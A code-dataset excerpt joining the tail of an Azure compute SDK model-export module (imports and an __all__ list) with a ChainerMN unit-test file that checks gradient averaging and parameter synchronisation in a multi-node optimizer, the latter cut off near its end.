from ._models_py3 import VirtualMachineImage
from ._models_py3 import VirtualMachineImageResource
from ._models_py3 import VirtualMachineInstanceView
from ._models_py3 import VirtualMachineListResult
from ._models_py3 import VirtualMachineReimageParameters
from ._models_py3 import VirtualMachineScaleSet
from ._models_py3 import VirtualMachineScaleSetDataDisk
from ._models_py3 import VirtualMachineScaleSetExtension
from ._models_py3 import VirtualMachineScaleSetExtensionListResult
from ._models_py3 import VirtualMachineScaleSetExtensionProfile
from ._models_py3 import VirtualMachineScaleSetIPConfiguration
from ._models_py3 import VirtualMachineScaleSetIdentity
from ._models_py3 import VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue
from ._models_py3 import VirtualMachineScaleSetInstanceView
from ._models_py3 import VirtualMachineScaleSetInstanceViewStatusesSummary
from ._models_py3 import VirtualMachineScaleSetIpTag
from ._models_py3 import VirtualMachineScaleSetListOSUpgradeHistory
from ._models_py3 import VirtualMachineScaleSetListResult
from ._models_py3 import VirtualMachineScaleSetListSkusResult
from ._models_py3 import VirtualMachineScaleSetListWithLinkResult
from ._models_py3 import VirtualMachineScaleSetManagedDiskParameters
from ._models_py3 import VirtualMachineScaleSetNetworkConfiguration
from ._models_py3 import VirtualMachineScaleSetNetworkConfigurationDnsSettings
from ._models_py3 import VirtualMachineScaleSetNetworkProfile
from ._models_py3 import VirtualMachineScaleSetOSDisk
from ._models_py3 import VirtualMachineScaleSetOSProfile
from ._models_py3 import VirtualMachineScaleSetPublicIPAddressConfiguration
from ._models_py3 import VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings
from ._models_py3 import VirtualMachineScaleSetReimageParameters
from ._models_py3 import VirtualMachineScaleSetSku
from ._models_py3 import VirtualMachineScaleSetSkuCapacity
from ._models_py3 import VirtualMachineScaleSetStorageProfile
from ._models_py3 import VirtualMachineScaleSetUpdate
from ._models_py3 import VirtualMachineScaleSetUpdateIPConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateNetworkConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateNetworkProfile
from ._models_py3 import VirtualMachineScaleSetUpdateOSDisk
from ._models_py3 import VirtualMachineScaleSetUpdateOSProfile
from ._models_py3 import VirtualMachineScaleSetUpdatePublicIPAddressConfiguration
from ._models_py3 import VirtualMachineScaleSetUpdateStorageProfile
from ._models_py3 import VirtualMachineScaleSetUpdateVMProfile
from ._models_py3 import VirtualMachineScaleSetVM
from ._models_py3 import VirtualMachineScaleSetVMExtensionsSummary
from ._models_py3 import VirtualMachineScaleSetVMInstanceIDs
from ._models_py3 import VirtualMachineScaleSetVMInstanceRequiredIDs
from ._models_py3 import VirtualMachineScaleSetVMInstanceView
from ._models_py3 import VirtualMachineScaleSetVMListResult
from ._models_py3 import VirtualMachineScaleSetVMNetworkProfileConfiguration
from ._models_py3 import VirtualMachineScaleSetVMProfile
from ._models_py3 import VirtualMachineScaleSetVMProtectionPolicy
from ._models_py3 import VirtualMachineScaleSetVMReimageParameters
from ._models_py3 import VirtualMachineSize
from ._models_py3 import VirtualMachineSizeListResult
from ._models_py3 import VirtualMachineStatusCodeCount
from ._models_py3 import VirtualMachineUpdate
from ._models_py3 import WinRMConfiguration
from ._models_py3 import WinRMListener
from ._models_py3 import WindowsConfiguration
except (SyntaxError, ImportError):
from ._models import AccessUri # type: ignore
from ._models import AdditionalCapabilities # type: ignore
from ._models import AdditionalUnattendContent # type: ignore
from ._models import ApiEntityReference # type: ignore
from ._models import ApiError # type: ignore
from ._models import ApiErrorBase # type: ignore
from ._models import AutomaticOSUpgradePolicy # type: ignore
from ._models import AutomaticOSUpgradeProperties # type: ignore
from ._models import AutomaticRepairsPolicy # type: ignore
from ._models import AvailabilitySet # type: ignore
from ._models import AvailabilitySetListResult # type: ignore
from ._models import AvailabilitySetUpdate # type: ignore
from ._models import BillingProfile # type: ignore
from ._models import BootDiagnostics # type: ignore
from ._models import BootDiagnosticsInstanceView # type: ignore
from ._models import ComputeOperationListResult # type: ignore
from ._models import ComputeOperationValue # type: ignore
from ._models import CreationData # type: ignore
from ._models import DataDisk # type: ignore
from ._models import DataDiskImage # type: ignore
from ._models import DedicatedHost # type: ignore
from ._models import DedicatedHostAllocatableVM # type: ignore
from ._models import DedicatedHostAvailableCapacity # type: ignore
from ._models import DedicatedHostGroup # type: ignore
from ._models import DedicatedHostGroupListResult # type: ignore
from ._models import DedicatedHostGroupUpdate # type: ignore
from ._models import DedicatedHostInstanceView # type: ignore
from ._models import DedicatedHostListResult # type: ignore
from ._models import DedicatedHostUpdate # type: ignore
from ._models import DiagnosticsProfile # type: ignore
from ._models import DiffDiskSettings # type: ignore
from ._models import Disallowed # type: ignore
from ._models import Disk # type: ignore
from ._models import DiskEncryptionSettings # type: ignore
from ._models import DiskInstanceView # type: ignore
from ._models import DiskList # type: ignore
from ._models import DiskSku # type: ignore
from ._models import DiskUpdate # type: ignore
from ._models import EncryptionSettingsCollection # type: ignore
from ._models import EncryptionSettingsElement # type: ignore
from ._models import Gallery # type: ignore
from ._models import GalleryApplication # type: ignore
from ._models import GalleryApplicationList # type: ignore
from ._models import GalleryApplicationVersion # type: ignore
from ._models import GalleryApplicationVersionList # type: ignore
from ._models import GalleryApplicationVersionPublishingProfile # type: ignore
from ._models import GalleryArtifactPublishingProfileBase # type: ignore
from ._models import GalleryArtifactSource # type: ignore
from ._models import GalleryDataDiskImage # type: ignore
from ._models import GalleryDiskImage # type: ignore
from ._models import GalleryIdentifier # type: ignore
from ._models import GalleryImage # type: ignore
from ._models import GalleryImageIdentifier # type: ignore
from ._models import GalleryImageList # type: ignore
from ._models import GalleryImageVersion # type: ignore
from ._models import GalleryImageVersionList # type: ignore
from ._models import GalleryImageVersionPublishingProfile # type: ignore
from ._models import GalleryImageVersionStorageProfile # type: ignore
from ._models import GalleryList # type: ignore
from ._models import GalleryOSDiskImage # type: ignore
from ._models import GrantAccessData # type: ignore
from ._models import HardwareProfile # type: ignore
from ._models import Image # type: ignore
from ._models import ImageDataDisk # type: ignore
from ._models import ImageDiskReference # type: ignore
from ._models import ImageListResult # type: ignore
from ._models import ImageOSDisk # type: ignore
from ._models import ImagePurchasePlan # type: ignore
from ._models import ImageReference # type: ignore
from ._models import ImageStorageProfile # type: ignore
from ._models import ImageUpdate # type: ignore
from ._models import InnerError # type: ignore
from ._models import InstanceViewStatus # type: ignore
from ._models import KeyVaultAndKeyReference # type: ignore
from ._models import KeyVaultAndSecretReference # type: ignore
from ._models import KeyVaultKeyReference # type: ignore
from ._models import KeyVaultSecretReference # type: ignore
from ._models import LinuxConfiguration # type: ignore
from ._models import ListUsagesResult # type: ignore
from ._models import LogAnalyticsInputBase # type: ignore
from ._models import LogAnalyticsOperationResult # type: ignore
from ._models import LogAnalyticsOutput # type: ignore
from ._models import MaintenanceRedeployStatus # type: ignore
from ._models import ManagedArtifact # type: ignore
from ._models import ManagedDiskParameters # type: ignore
from ._models import NetworkInterfaceReference # type: ignore
from ._models import NetworkProfile # type: ignore
from ._models import OSDisk # type: ignore
from ._models import OSDiskImage # type: ignore
from ._models import OSProfile # type: ignore
from ._models import Plan # type: ignore
from ._models import ProximityPlacementGroup # type: ignore
from ._models import ProximityPlacementGroupListResult # type: ignore
from ._models import ProximityPlacementGroupUpdate # type: ignore
from ._models import PurchasePlan # type: ignore
from ._models import RecommendedMachineConfiguration # type: ignore
from ._models import RecoveryWalkResponse # type: ignore
from ._models import RegionalReplicationStatus # type: ignore
from ._models import ReplicationStatus # type: ignore
from ._models import RequestRateByIntervalInput # type: ignore
from ._models import Resource # type: ignore
from ._models import ResourceRange # type: ignore
from ._models import RollbackStatusInfo # type: ignore
from ._models import RollingUpgradePolicy # type: ignore
from ._models import RollingUpgradeProgressInfo # type: ignore
from ._models import RollingUpgradeRunningStatus # type: ignore
from ._models import RollingUpgradeStatusInfo # type: ignore
from ._models import RunCommandDocument # type: ignore
from ._models import RunCommandDocumentBase # type: ignore
from ._models import RunCommandInput # type: ignore
from ._models import RunCommandInputParameter # type: ignore
from ._models import RunCommandListResult # type: ignore
from ._models import RunCommandParameterDefinition # type: ignore
from ._models import RunCommandResult # type: ignore
from ._models import ScaleInPolicy # type: ignore
from ._models import ScheduledEventsProfile # type: ignore
from ._models import Sku # type: ignore
from ._models import Snapshot # type: ignore
from ._models import SnapshotList # type: ignore
from ._models import SnapshotSku # type: ignore
from ._models import SnapshotUpdate # type: ignore
from ._models import SourceVault # type: ignore
from ._models import SshConfiguration # type: ignore
from ._models import SshPublicKey # type: ignore
from ._models import StorageProfile # type: ignore
from ._models import SubResource # type: ignore
from ._models import SubResourceReadOnly # type: ignore
from ._models import TargetRegion # type: ignore
from ._models import TerminateNotificationProfile # type: ignore
from ._models import ThrottledRequestsInput # type: ignore
from ._models import UpdateResource # type: ignore
from ._models import UpgradeOperationHistoricalStatusInfo # type: ignore
from ._models import UpgradeOperationHistoricalStatusInfoProperties # type: ignore
from ._models import UpgradeOperationHistoryStatus # type: ignore
from ._models import UpgradePolicy # type: ignore
from ._models import Usage # type: ignore
from ._models import UsageName # type: ignore
from ._models import UserArtifactManage # type: ignore
from ._models import UserArtifactSource # type: ignore
from ._models import UserAssignedIdentitiesValue # type: ignore
from ._models import VMScaleSetConvertToSinglePlacementGroupInput # type: ignore
from ._models import VaultCertificate # type: ignore
from ._models import VaultSecretGroup # type: ignore
from ._models import VirtualHardDisk # type: ignore
from ._models import VirtualMachine # type: ignore
from ._models import VirtualMachineAgentInstanceView # type: ignore
from ._models import VirtualMachineCaptureParameters # type: ignore
from ._models import VirtualMachineCaptureResult # type: ignore
from ._models import VirtualMachineExtension # type: ignore
from ._models import VirtualMachineExtensionHandlerInstanceView # type: ignore
from ._models import VirtualMachineExtensionImage # type: ignore
from ._models import VirtualMachineExtensionInstanceView # type: ignore
from ._models import VirtualMachineExtensionUpdate # type: ignore
from ._models import VirtualMachineExtensionsListResult # type: ignore
from ._models import VirtualMachineHealthStatus # type: ignore
from ._models import VirtualMachineIdentity # type: ignore
from ._models import VirtualMachineImage # type: ignore
from ._models import VirtualMachineImageResource # type: ignore
from ._models import VirtualMachineInstanceView # type: ignore
from ._models import VirtualMachineListResult # type: ignore
from ._models import VirtualMachineReimageParameters # type: ignore
from ._models import VirtualMachineScaleSet # type: ignore
from ._models import VirtualMachineScaleSetDataDisk # type: ignore
from ._models import VirtualMachineScaleSetExtension # type: ignore
from ._models import VirtualMachineScaleSetExtensionListResult # type: ignore
from ._models import VirtualMachineScaleSetExtensionProfile # type: ignore
from ._models import VirtualMachineScaleSetIPConfiguration # type: ignore
from ._models import VirtualMachineScaleSetIdentity # type: ignore
from ._models import VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue # type: ignore
from ._models import VirtualMachineScaleSetInstanceView # type: ignore
from ._models import VirtualMachineScaleSetInstanceViewStatusesSummary # type: ignore
from ._models import VirtualMachineScaleSetIpTag # type: ignore
from ._models import VirtualMachineScaleSetListOSUpgradeHistory # type: ignore
from ._models import VirtualMachineScaleSetListResult # type: ignore
from ._models import VirtualMachineScaleSetListSkusResult # type: ignore
from ._models import VirtualMachineScaleSetListWithLinkResult # type: ignore
from ._models import VirtualMachineScaleSetManagedDiskParameters # type: ignore
from ._models import VirtualMachineScaleSetNetworkConfiguration # type: ignore
from ._models import VirtualMachineScaleSetNetworkConfigurationDnsSettings # type: ignore
from ._models import VirtualMachineScaleSetNetworkProfile # type: ignore
from ._models import VirtualMachineScaleSetOSDisk # type: ignore
from ._models import VirtualMachineScaleSetOSProfile # type: ignore
from ._models import VirtualMachineScaleSetPublicIPAddressConfiguration # type: ignore
from ._models import VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings # type: ignore
from ._models import VirtualMachineScaleSetReimageParameters # type: ignore
from ._models import VirtualMachineScaleSetSku # type: ignore
from ._models import VirtualMachineScaleSetSkuCapacity # type: ignore
from ._models import VirtualMachineScaleSetStorageProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdate # type: ignore
from ._models import VirtualMachineScaleSetUpdateIPConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateNetworkConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateNetworkProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdateOSDisk # type: ignore
from ._models import VirtualMachineScaleSetUpdateOSProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdatePublicIPAddressConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateStorageProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdateVMProfile # type: ignore
from ._models import VirtualMachineScaleSetVM # type: ignore
from ._models import VirtualMachineScaleSetVMExtensionsSummary # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceIDs # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceRequiredIDs # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceView # type: ignore
from ._models import VirtualMachineScaleSetVMListResult # type: ignore
from ._models import VirtualMachineScaleSetVMNetworkProfileConfiguration # type: ignore
from ._models import VirtualMachineScaleSetVMProfile # type: ignore
from ._models import VirtualMachineScaleSetVMProtectionPolicy # type: ignore
from ._models import VirtualMachineScaleSetVMReimageParameters # type: ignore
from ._models import VirtualMachineSize # type: ignore
from ._models import VirtualMachineSizeListResult # type: ignore
from ._models import VirtualMachineStatusCodeCount # type: ignore
from ._models import VirtualMachineUpdate # type: ignore
from ._models import WinRMConfiguration # type: ignore
from ._models import WinRMListener # type: ignore
from ._models import WindowsConfiguration # type: ignore
from ._compute_management_client_enums import (
AccessLevel,
AggregatedReplicationState,
AvailabilitySetSkuTypes,
CachingTypes,
DedicatedHostLicenseTypes,
DiffDiskOptions,
DiskCreateOption,
DiskCreateOptionTypes,
DiskState,
DiskStorageAccountTypes,
GalleryApplicationVersionPropertiesProvisioningState,
GalleryImagePropertiesProvisioningState,
GalleryImageVersionPropertiesProvisioningState,
GalleryPropertiesProvisioningState,
HostCaching,
HyperVGeneration,
HyperVGenerationType,
HyperVGenerationTypes,
IPVersion,
IntervalInMins,
MaintenanceOperationResultCodeTypes,
OperatingSystemStateTypes,
OperatingSystemTypes,
ProtocolTypes,
ProximityPlacementGroupType,
ReplicationState,
ReplicationStatusTypes,
ResourceIdentityType,
RollingUpgradeActionType,
RollingUpgradeStatusCode,
SettingNames,
SnapshotStorageAccountTypes,
StatusLevelTypes,
StorageAccountType,
StorageAccountTypes,
UpgradeMode,
UpgradeOperationInvoker,
UpgradeState,
VirtualMachineEvictionPolicyTypes,
VirtualMachinePriorityTypes,
VirtualMachineScaleSetScaleInRules,
VirtualMachineScaleSetSkuScaleType,
VirtualMachineSizeTypes,
)
__all__ = [
'AccessUri',
'AdditionalCapabilities',
'AdditionalUnattendContent',
'ApiEntityReference',
'ApiError',
'ApiErrorBase',
'AutomaticOSUpgradePolicy',
'AutomaticOSUpgradeProperties',
'AutomaticRepairsPolicy',
'AvailabilitySet',
'AvailabilitySetListResult',
'AvailabilitySetUpdate',
'BillingProfile',
'BootDiagnostics',
'BootDiagnosticsInstanceView',
'ComputeOperationListResult',
'ComputeOperationValue',
'CreationData',
'DataDisk',
'DataDiskImage',
'DedicatedHost',
'DedicatedHostAllocatableVM',
'DedicatedHostAvailableCapacity',
'DedicatedHostGroup',
'DedicatedHostGroupListResult',
'DedicatedHostGroupUpdate',
'DedicatedHostInstanceView',
'DedicatedHostListResult',
'DedicatedHostUpdate',
'DiagnosticsProfile',
'DiffDiskSettings',
'Disallowed',
'Disk',
'DiskEncryptionSettings',
'DiskInstanceView',
'DiskList',
'DiskSku',
'DiskUpdate',
'EncryptionSettingsCollection',
'EncryptionSettingsElement',
'Gallery',
'GalleryApplication',
'GalleryApplicationList',
'GalleryApplicationVersion',
'GalleryApplicationVersionList',
'GalleryApplicationVersionPublishingProfile',
'GalleryArtifactPublishingProfileBase',
'GalleryArtifactSource',
'GalleryDataDiskImage',
'GalleryDiskImage',
'GalleryIdentifier',
'GalleryImage',
'GalleryImageIdentifier',
'GalleryImageList',
'GalleryImageVersion',
'GalleryImageVersionList',
'GalleryImageVersionPublishingProfile',
'GalleryImageVersionStorageProfile',
'GalleryList',
'GalleryOSDiskImage',
'GrantAccessData',
'HardwareProfile',
'Image',
'ImageDataDisk',
'ImageDiskReference',
'ImageListResult',
'ImageOSDisk',
'ImagePurchasePlan',
'ImageReference',
'ImageStorageProfile',
'ImageUpdate',
'InnerError',
'InstanceViewStatus',
'KeyVaultAndKeyReference',
'KeyVaultAndSecretReference',
'KeyVaultKeyReference',
'KeyVaultSecretReference',
'LinuxConfiguration',
'ListUsagesResult',
'LogAnalyticsInputBase',
'LogAnalyticsOperationResult',
'LogAnalyticsOutput',
'MaintenanceRedeployStatus',
'ManagedArtifact',
'ManagedDiskParameters',
'NetworkInterfaceReference',
'NetworkProfile',
'OSDisk',
'OSDiskImage',
'OSProfile',
'Plan',
'ProximityPlacementGroup',
'ProximityPlacementGroupListResult',
'ProximityPlacementGroupUpdate',
'PurchasePlan',
'RecommendedMachineConfiguration',
'RecoveryWalkResponse',
'RegionalReplicationStatus',
'ReplicationStatus',
'RequestRateByIntervalInput',
'Resource',
'ResourceRange',
'RollbackStatusInfo',
'RollingUpgradePolicy',
'RollingUpgradeProgressInfo',
'RollingUpgradeRunningStatus',
'RollingUpgradeStatusInfo',
'RunCommandDocument',
'RunCommandDocumentBase',
'RunCommandInput',
'RunCommandInputParameter',
'RunCommandListResult',
'RunCommandParameterDefinition',
'RunCommandResult',
'ScaleInPolicy',
'ScheduledEventsProfile',
'Sku',
'Snapshot',
'SnapshotList',
'SnapshotSku',
'SnapshotUpdate',
'SourceVault',
'SshConfiguration',
'SshPublicKey',
'StorageProfile',
'SubResource',
'SubResourceReadOnly',
'TargetRegion',
'TerminateNotificationProfile',
'ThrottledRequestsInput',
'UpdateResource',
'UpgradeOperationHistoricalStatusInfo',
'UpgradeOperationHistoricalStatusInfoProperties',
'UpgradeOperationHistoryStatus',
'UpgradePolicy',
'Usage',
'UsageName',
'UserArtifactManage',
'UserArtifactSource',
'UserAssignedIdentitiesValue',
'VMScaleSetConvertToSinglePlacementGroupInput',
'VaultCertificate',
'VaultSecretGroup',
'VirtualHardDisk',
'VirtualMachine',
'VirtualMachineAgentInstanceView',
'VirtualMachineCaptureParameters',
'VirtualMachineCaptureResult',
'VirtualMachineExtension',
'VirtualMachineExtensionHandlerInstanceView',
'VirtualMachineExtensionImage',
'VirtualMachineExtensionInstanceView',
'VirtualMachineExtensionUpdate',
'VirtualMachineExtensionsListResult',
'VirtualMachineHealthStatus',
'VirtualMachineIdentity',
'VirtualMachineImage',
'VirtualMachineImageResource',
'VirtualMachineInstanceView',
'VirtualMachineListResult',
'VirtualMachineReimageParameters',
'VirtualMachineScaleSet',
'VirtualMachineScaleSetDataDisk',
'VirtualMachineScaleSetExtension',
'VirtualMachineScaleSetExtensionListResult',
'VirtualMachineScaleSetExtensionProfile',
'VirtualMachineScaleSetIPConfiguration',
'VirtualMachineScaleSetIdentity',
'VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue',
'VirtualMachineScaleSetInstanceView',
'VirtualMachineScaleSetInstanceViewStatusesSummary',
'VirtualMachineScaleSetIpTag',
'VirtualMachineScaleSetListOSUpgradeHistory',
'VirtualMachineScaleSetListResult',
'VirtualMachineScaleSetListSkusResult',
'VirtualMachineScaleSetListWithLinkResult',
'VirtualMachineScaleSetManagedDiskParameters',
'VirtualMachineScaleSetNetworkConfiguration',
'VirtualMachineScaleSetNetworkConfigurationDnsSettings',
'VirtualMachineScaleSetNetworkProfile',
'VirtualMachineScaleSetOSDisk',
'VirtualMachineScaleSetOSProfile',
'VirtualMachineScaleSetPublicIPAddressConfiguration',
'VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings',
'VirtualMachineScaleSetReimageParameters',
'VirtualMachineScaleSetSku',
'VirtualMachineScaleSetSkuCapacity',
'VirtualMachineScaleSetStorageProfile',
'VirtualMachineScaleSetUpdate',
'VirtualMachineScaleSetUpdateIPConfiguration',
'VirtualMachineScaleSetUpdateNetworkConfiguration',
'VirtualMachineScaleSetUpdateNetworkProfile',
'VirtualMachineScaleSetUpdateOSDisk',
'VirtualMachineScaleSetUpdateOSProfile',
'VirtualMachineScaleSetUpdatePublicIPAddressConfiguration',
'VirtualMachineScaleSetUpdateStorageProfile',
'VirtualMachineScaleSetUpdateVMProfile',
'VirtualMachineScaleSetVM',
'VirtualMachineScaleSetVMExtensionsSummary',
'VirtualMachineScaleSetVMInstanceIDs',
'VirtualMachineScaleSetVMInstanceRequiredIDs',
'VirtualMachineScaleSetVMInstanceView',
'VirtualMachineScaleSetVMListResult',
'VirtualMachineScaleSetVMNetworkProfileConfiguration',
'VirtualMachineScaleSetVMProfile',
'VirtualMachineScaleSetVMProtectionPolicy',
'VirtualMachineScaleSetVMReimageParameters',
'VirtualMachineSize',
'VirtualMachineSizeListResult',
'VirtualMachineStatusCodeCount',
'VirtualMachineUpdate',
'WinRMConfiguration',
'WinRMListener',
'WindowsConfiguration',
'AccessLevel',
'AggregatedReplicationState',
'AvailabilitySetSkuTypes',
'CachingTypes',
'DedicatedHostLicenseTypes',
'DiffDiskOptions',
'DiskCreateOption',
'DiskCreateOptionTypes',
'DiskState',
'DiskStorageAccountTypes',
'GalleryApplicationVersionPropertiesProvisioningState',
'GalleryImagePropertiesProvisioningState',
'GalleryImageVersionPropertiesProvisioningState',
'GalleryPropertiesProvisioningState',
'HostCaching',
'HyperVGeneration',
'HyperVGenerationType',
'HyperVGenerationTypes',
'IPVersion',
'IntervalInMins',
'MaintenanceOperationResultCodeTypes',
'OperatingSystemStateTypes',
'OperatingSystemTypes',
'ProtocolTypes',
'ProximityPlacementGroupType',
'ReplicationState',
'ReplicationStatusTypes',
'ResourceIdentityType',
'RollingUpgradeActionType',
'RollingUpgradeStatusCode',
'SettingNames',
'SnapshotStorageAccountTypes',
'StatusLevelTypes',
'StorageAccountType',
'StorageAccountTypes',
'UpgradeMode',
'UpgradeOperationInvoker',
'UpgradeState',
'VirtualMachineEvictionPolicyTypes',
'VirtualMachinePriorityTypes',
'VirtualMachineScaleSetScaleInRules',
'VirtualMachineScaleSetSkuScaleType',
'VirtualMachineSizeTypes',
]
| mit | -8,375,254,461,826,944,000 | 46.698925 | 102 | 0.764766 | false |
niboshi/chainer | tests/chainermn_tests/optimizer_tests/test_multi_node_optimizer.py | 2 | 9956 | import chainer
from chainer.backends.cuda import cupy
import chainer.testing
import chainer.testing.attr
import chainermn
import mock
import numpy as np
import unittest
class ExampleModel(chainer.Chain):
def __init__(self):
super(ExampleModel, self).__init__()
with self.init_scope():
self.a = chainer.links.Linear(2, 3)
self.b = chainer.links.Linear(3, 4)
self.c = chainer.links.Linear(4, 5)
class TestMultiNodeOptimizer(unittest.TestCase):
def setup_cpu(self):
self.comm = chainermn.create_communicator('naive')
self.target = ExampleModel()
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.c.W.data[:] = self.comm.rank + 2
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.target.c.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def setup_gpu(self, device=None):
self.comm = chainermn.create_communicator('flat')
device = self.comm.intra_rank
chainer.cuda.get_device_from_id(device).use()
self.target = ExampleModel()
self.target.to_device(cupy.cuda.Device())
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.c.W.data[:] = self.comm.rank + 2
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.target.c.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def test_update_with_cpu(self):
self.setup_cpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
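        # The multi node optimizer averages gradients across ranks, so each
        # parameter's gradient becomes mean(rank) + offset = (size - 1) / 2 + offset.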
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((5, 4)))
@chainer.testing.attr.gpu
def test_update_with_gpu(self):
self.setup_gpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((5, 4)))
class DynamicExampleModel(chainer.Chain):
def __init__(self):
super(DynamicExampleModel, self).__init__()
with self.init_scope():
self.a = chainer.links.Linear(2, 3)
self.b = chainer.links.Linear(3, 4)
class TestMultiNodeOptimizerWithDynamicModel(unittest.TestCase):
def setup_cpu(self):
self.comm = chainermn.create_communicator('naive')
self.target = DynamicExampleModel()
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def setup_gpu(self, device=None):
self.comm = chainermn.create_communicator('flat')
device = self.comm.intra_rank
chainer.cuda.get_device_from_id(device).use()
self.target = DynamicExampleModel()
self.target.to_device(cupy.cuda.Device())
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def test_update_with_cpu(self):
self.setup_cpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
with self.target.init_scope():
self.target.c = chainer.links.Linear(4, 4)
if self.comm.rank == 0:
self.target.c.W.data[:] = self.comm.rank + 2
self.optimizer.setup(self.target)
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
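        # After setup()/update(), the newly added link's weights are expected to
        # have been synchronised from rank 0, so every rank should now hold the
        # same values for c.W.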
send_buf = chainer.cuda.to_cpu(self.optimizer.target.c.W.data)
recv_buf = self.comm.mpi_comm.allgather(send_buf)
for i in range(1, self.comm.size):
chainer.testing.assert_allclose(recv_buf[0], recv_buf[i])
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((4, 4)))
@chainer.testing.attr.gpu
def test_update_with_gpu(self):
self.setup_gpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
with self.target.init_scope():
c = chainer.links.Linear(4, 4)
c.to_device(cupy.cuda.Device())
self.target.c = c
if self.comm.rank == 0:
self.target.c.W.data[:] = self.comm.rank + 2
self.optimizer.setup(self.target)
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
send_buf = chainer.cuda.to_cpu(self.optimizer.target.c.W.data)
recv_buf = self.comm.mpi_comm.allgather(send_buf)
for i in range(1, self.comm.size):
chainer.testing.assert_allclose(recv_buf[0], recv_buf[i])
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
